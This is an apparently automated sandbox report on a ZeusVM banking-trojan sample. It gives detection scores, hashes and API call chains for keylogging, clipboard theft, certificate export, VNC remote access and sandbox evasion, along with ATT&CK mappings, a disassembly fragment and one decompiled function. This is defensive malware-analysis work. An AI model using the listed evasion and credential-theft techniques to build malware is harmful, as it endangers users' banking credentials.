Edit tour

Windows Analysis Report
6qr4g3TReL.bin

Overview

General Information

Sample Name:	6qr4g3TReL.bin (renamed file extension from bin to exe)
Analysis ID:	660120
MD5:	2d2f0c7af61867cd84f2e419a62cef16
SHA1:	e734bb114c2f47dc900d3a5a526db94f0b752ba0
SHA256:	5b3d4395b0f5acd40bc20f4bf3930cbd14da3d240ad67f7ab9a65de0681e8742
Tags:	exezeus2
Infos:

Detection

ZeusVM

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected ZeusVM e-Banking Trojan

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Contains VNC / remote desktop functionality (version string found)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to launch a process as a different user

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Contains functionality to enumerate network shares

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

May initialize a security null descriptor

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

6qr4g3TReL.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\6qr4g3TReL.exe" MD5: 2D2F0C7AF61867CD84F2E419A62CEF16)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 6qr4g3TReL.exe	Virustotal: Detection: 71%			Perma Link
Source: 6qr4g3TReL.exe	ReversingLabs: Detection: 93%

Antivirus / Scanner detection for submitted sample

Source: 6qr4g3TReL.exe

Avira: detected

Machine Learning detection for sample

Source: 6qr4g3TReL.exe

Joe Sandbox ML: detected

Source: 0.2.6qr4g3TReL.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen
Source: 0.0.6qr4g3TReL.exe.400000.0.unpack	Avira: Label: TR/Spy.Zbot.vbb.4

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00409A27 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,

0_2_00409A27

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Unpacked PE file: 0.2.6qr4g3TReL.exe.400000.0.unpack

Source: 6qr4g3TReL.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00414625 LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

0_2_00414625

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040DDAD FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040DDAD
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040DE68 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040DE68

Source: 6qr4g3TReL.exe, 6qr4g3TReL.exe, 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/webhp
Source: 6qr4g3TReL.exe, 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/webhpbcSeTcbPrivilege.exeSOFTWARE

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_0040A436 WaitForSingleObject,InternetReadFile,

0_2_0040A436

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_0041B12F GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

0_2_0041B12F

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_0041AFC2 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_0041AFC2

E-Banking Fraud

Detected ZeusVM e-Banking Trojan

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_004078C6 lstrcmpiA,lstrcmpiA,lstrcmpiA,

0_2_004078C6

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00419513 OpenDesktopW,CreateDesktopW,

0_2_00419513

Source: 6qr4g3TReL.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00414D4D InitiateSystemShutdownExW,ExitWindowsEx,	0_2_00414D4D
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0041A5E9 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	0_2_0041A5E9
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0041A3A6 ExitWindowsEx,	0_2_0041A3A6

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00409934	0_2_00409934
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0041119E	0_2_0041119E
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00401DBB	0_2_00401DBB
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040B394	0_2_0040B394

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00409FB8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_00409FB8

Source: 6qr4g3TReL.exe	Virustotal: Detection: 71%
Source: 6qr4g3TReL.exe	ReversingLabs: Detection: 93%

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00409D62 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_00409D62

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040707D CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_0040707D
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00406F0A CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_00406F0A

Source: classification engine

Classification label: mal92.bank.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_0040EBA9 CoCreateInstance,

0_2_0040EBA9

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00409D0E CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

0_2_00409D0E

Source: 6qr4g3TReL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Unpacked PE file: 0.2.6qr4g3TReL.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Unpacked PE file: 0.2.6qr4g3TReL.exe.400000.0.unpack .text:ER;.bdata:R;.data:W;.odata:R;.data:EW;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00402045 push es; iretd	0_2_00402054
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00414018 push ebp; ret	0_2_00414021
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_004026DB push cs; ret	0_2_004026F0
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_00402711 push cs; iretd	0_2_00402720
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_004143ED push esp; iretd	0_2_004143F6

Source: 6qr4g3TReL.exe	Static PE information: section name: .bdata
Source: 6qr4g3TReL.exe	Static PE information: section name: .odata

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00413E51 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,FreeLibrary,

0_2_00413E51

Source: initial sample

Static PE information: section name: .data entropy: 7.377212715179087

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00406765 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_00406765

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_0-12784
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_0-12784

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-12294

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-12372

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

API coverage: 1.5 %

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040DDAD FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040DDAD
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040DE68 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040DE68

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00413E51 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,FreeLibrary,

0_2_00413E51

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00419B3D HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_00419B3D

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_004196D9 mov edx, dword ptr fs:[00000030h]

0_2_004196D9

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_0040BC79 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_0040BC79

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_004070CD PFXImportCertStore,GetSystemTime,

0_2_004070CD

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_004087B9 GetTimeZoneInformation,

0_2_004087B9

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00406CAF GetVersionExW,

0_2_00406CAF

Source: C:\Users\user\Desktop\6qr4g3TReL.exe

Code function: 0_2_00413091 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_00413091

Source: 6qr4g3TReL.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: 6qr4g3TReL.exe	String found in binary or memory: RFB 003.003
Source: 6qr4g3TReL.exe	String found in binary or memory: RFB 003.003
Source: 6qr4g3TReL.exe, 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.003
Source: 6qr4g3TReL.exe, 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptnbsp;tmp%s%08x.%s%s%08x*RFB 003.003

Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040BAA8 socket,bind,closesocket,		0_2_0040BAA8
Source: C:\Users\user\Desktop\6qr4g3TReL.exe	Code function: 0_2_0040B783 socket,bind,listen,closesocket,		0_2_0040B783

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	13 Native API	1 Create Account	1 Valid Accounts	1 Valid Accounts	11 Input Capture	1 Network Share Discovery	1 Remote Desktop Protocol	11 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 Valid Accounts	11 Access Token Manipulation	11 Access Token Manipulation	LSASS Memory	2 System Time Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Remote Access Software	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Install Root Certificate	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6qr4g3TReL.exe	71%	Virustotal		Browse
6qr4g3TReL.exe	93%	ReversingLabs	Win32.Trojan.Zeus
6qr4g3TReL.exe	100%	Avira	TR/Spy.Zbot.vbb.4
6qr4g3TReL.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.6qr4g3TReL.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen		Download File
0.0.6qr4g3TReL.exe.400000.0.unpack	100%	Avira	TR/Spy.Zbot.vbb.4		Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.google.com/webhp	6qr4g3TReL.exe, 6qr4g3TReL.exe, 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp	false		high
http://www.google.com/webhpbcSeTcbPrivilege.exeSOFTWARE	6qr4g3TReL.exe, 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	660120
Start date and time: 09/07/202204:03:12	2022-07-09 04:03:12 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	6qr4g3TReL.bin (renamed file extension from bin to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.bank.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.4% (good quality ratio 92.7%) Quality average: 82.5% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 88% Number of executed functions: 4 Number of non-executed functions: 121
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 20.82.210.154
Excluded domains from analysis (whitelisted): go.microsoft.com, store-images.s-microsoft.com, settings-win.data.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.271383129337848
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6qr4g3TReL.exe
File size:	120320
MD5:	2d2f0c7af61867cd84f2e419a62cef16
SHA1:	e734bb114c2f47dc900d3a5a526db94f0b752ba0
SHA256:	5b3d4395b0f5acd40bc20f4bf3930cbd14da3d240ad67f7ab9a65de0681e8742
SHA512:	82a56fd148157c9957daa001b2dc0a31720e5a452a800e38fff2fae3661abab11f3cef04bdf4575bfb29d3a925e0b57bf65d809f6c8421721bad763dfd8eebd9
SSDEEP:	3072:+Is+YKqkUGyV60eGb+DEAdYiHwKW6GGNk885qbh:+WYKqLeBddjHwrPGe88Ih
TLSH:	85C3023AC02F2D05F4507C3006EB52A8EB98FD925E1666DF5F4A500FBD16E91A9B025F
File Content Preview:	MZP.....................@...................................@...PE..L...Vm.6............................ ........@....@..........................`.......w.......................................@.......................................1.. ..................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x401620
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x36EA6D56 [Sat Mar 13 13:51:18 1999 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0bf2acd23359b9e1b2b09733eb741a41

Entrypoint Preview

Instruction
mov eax, dword ptr [esp+08h]
cmp eax, 00000000h
je 00007FA6C8D72835h
add eax, 04h
call 00007FA6C8D72574h
push 00000056h
push 00000054h
call 00007FA6C8D722A5h
add esp, 08h
sub edx, ecx
mov dword ptr [00405052h], esi
mov esi, dword ptr [0040500Ch]
mov eax, ebx
push 0040511Eh
push 00000000h
push 0000009Ch
call 00007FA6C8D72985h
call 00007FA6C8D72986h
cmp eax, 02h
jne 00007FA6C8D72945h
xor edi, edi
add eax, dword ptr [0040512Dh]
add dword ptr [00405131h], eax
mov dword ptr [004050DFh], edx
mov ebx, edx
mov eax, ebx
add edi, 01h
cmp edi, 00000F2Fh
jc 00007FA6C8D72811h
call 00007FA6C8D72507h
xor edi, edi
sub ecx, eax
mov esi, esp
xor edx, dword ptr [00405135h]
add edx, esi
mov esi, ebx
mov edx, dword ptr [00405139h]
add edi, 01h
cmp edi, 00001094h
jc 00007FA6C8D72813h
add dword ptr [004050DFh], ebx
mov eax, esi
push 000000DDh
push 0040513Dh
push 00000000h
call 00007FA6C8D72901h
call 00007FA6C8D72544h
xor edi, edi
sub edx, dword ptr [0040500Ch]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4000	0x4a0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f000	0x1cc8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21000	0xca	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x310b	0x20	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2200	0x1c	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2cf3	0x2e00	False	0.5534137228260869	data	4.46738070074491	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bdata	0x4000	0x126	0x200	False	0.384765625	data	2.610488321447332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5000	0x1ba	0x200	False	0.35546875	data	2.645869961576107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.odata	0x6000	0x160f8	0x16200	False	0.9766949152542372	data	7.785801588267968	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1d000	0x1aec	0x1c00	False	0.8441685267857143	data	7.377212715179087	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1f000	0x1cc8	0x1e00	False	0.21575520833333334	data	2.1308343153579132	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21000	0x40ca	0x200	False	0.431640625	data	3.1034497495820172	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x1f208	0x6d1	data	English	United States
RT_BITMAP	0x1f8dc	0x2d2	data	English	United States
RT_MENU	0x1fbb0	0x256	data	English	United States
RT_DIALOG	0x1fe08	0x2b5	data	English	United States
RT_FONT	0x200c0	0x58a	data	English	United States
RT_ACCELERATOR	0x2064c	0x511	data	English	United States
RT_MANIFEST	0x20b60	0x165	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	ExitProcess, FindResourceA, GetLastError, GetLocaleInfoA, GetSystemTime, OpenSemaphoreA, QueryPerformanceCounter
user32.dll	GetSystemMetrics, LoadStringA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: 6qr4g3TReL.exePID: 7088, Parent PID: 5340

General

Target ID:	0
Start time:	04:04:18
Start date:	09/07/2022
Path:	C:\Users\user\Desktop\6qr4g3TReL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6qr4g3TReL.exe"
Imagebase:	0x400000
File size:	120320 bytes
MD5 hash:	2D2F0C7AF61867CD84F2E419A62CEF16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 6qr4g3TReL.exePID: 7088, Parent PID: 5340COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.4%
Total number of Nodes:	843
Total number of Limit Nodes:	5

Executed Functions

Function 0040BC79 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0040BC79(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_push(0);
					_t19 =  &_v8;
					_push(_t19);
					_push(1);
					_push(L"S:(ML;;NRNWNX;;;LW)"); // executed
					L0041C138(); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x0040bc79
0x0040bc79
0x0040bc8b
0x00000000
0x0040bc9e
0x0040bc9e
0x0040bc9f
0x0040bca2
0x0040bca3
0x0040bca5
0x0040bcaa
0x0040bcb1
0x0040bcec
0x0040bcec
0x0040bcf0
0x0040bcf2
0x0040bcf4
0x0040bcfa
0x0040bcfd
0x0040bcfd
0x00000000
0x0040bd00
0x0040bcc2
0x0040bccd
0x0040bce6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bccd

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040BC83
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,00000001), ref: 0040BC94
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 0040BCAA
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NRNWNX;;;LW),00000001,?,00000000,?,00000001,00000000,00000000,?,00000001), ref: 0040BCC5
SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,00000001,00000000,00000000,?,00000001), ref: 0040BCD9
LocalFree.KERNEL32(?,?,00000001,00000000,00000000,?,00000001), ref: 0040BCE6

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 0040BCA5

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin
